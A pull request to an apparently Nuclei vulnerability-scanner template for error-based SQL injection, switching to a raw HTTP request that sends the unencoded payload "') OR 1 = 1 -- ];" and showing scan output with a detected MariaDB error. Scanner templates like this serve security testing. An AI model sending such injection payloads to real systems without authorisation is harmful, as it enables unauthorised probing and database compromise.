### PR TITLE
Update error-based-sql-injection.yaml

### DIFF
--- a/vulnerabilities/generic/error-based-sql-injection.yaml
+++ b/vulnerabilities/generic/error-based-sql-injection.yaml
@@ -8,12 +8,13 @@ info:
   tags: sqli
 
 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/') OR 1 = 1 -- ];"
-
-    # Nuclei's use of net/http here will automatically encode the payload, thus sending {{BaseURL}}/%27%29%20OR%201%20=%201%20--%20%5D; as the request
-    # In order to send an unencoded payload, you'll have to make use of the rawhttp library by crafting a raw HTTP request
+  - raw:
+      - |+
+        GET /') OR 1 = 1 -- ];
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+        Accept: */*
+        Connection: close
 
     matchers-condition: and
     matchers:

--- a/vulnerabilities/generic/error-based-sql-injection.yaml
+++ b/vulnerabilities/generic/error-based-sql-injection.yaml
@@ -9,7 +9,7 @@ info:
 
 requests:
   - raw:
-      - |+
+      - |
         GET /') OR 1 = 1 -- ];
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0


### PR DESCRIPTION
Reverting back to raw http request. Sending encoded requests using net/http were missing blatant SQL injections. 

Before:
```
[INF] Loading templates...
[INF] [error-based-sql-injection] Error based SQL injection (@geeknik) [high]
[INF] Loading workflows...
[INF] Using 1 rules (1 templates, 0 workflows)
[INF] No results found. Better luck next time!
```

After:
```
[INF] Loading templates...
[INF] [error-based-sql-injection] Error based SQL injection (@geeknik) [high]
[INF] Loading workflows...
[INF] Using 1 rules (1 templates, 0 workflows)
[2021-03-20 14:48:59] [error-based-sql-injection:MariaDB] [http] [high] https://REDACTED/') [check the manual that corresponds to your MariaDB server version]
```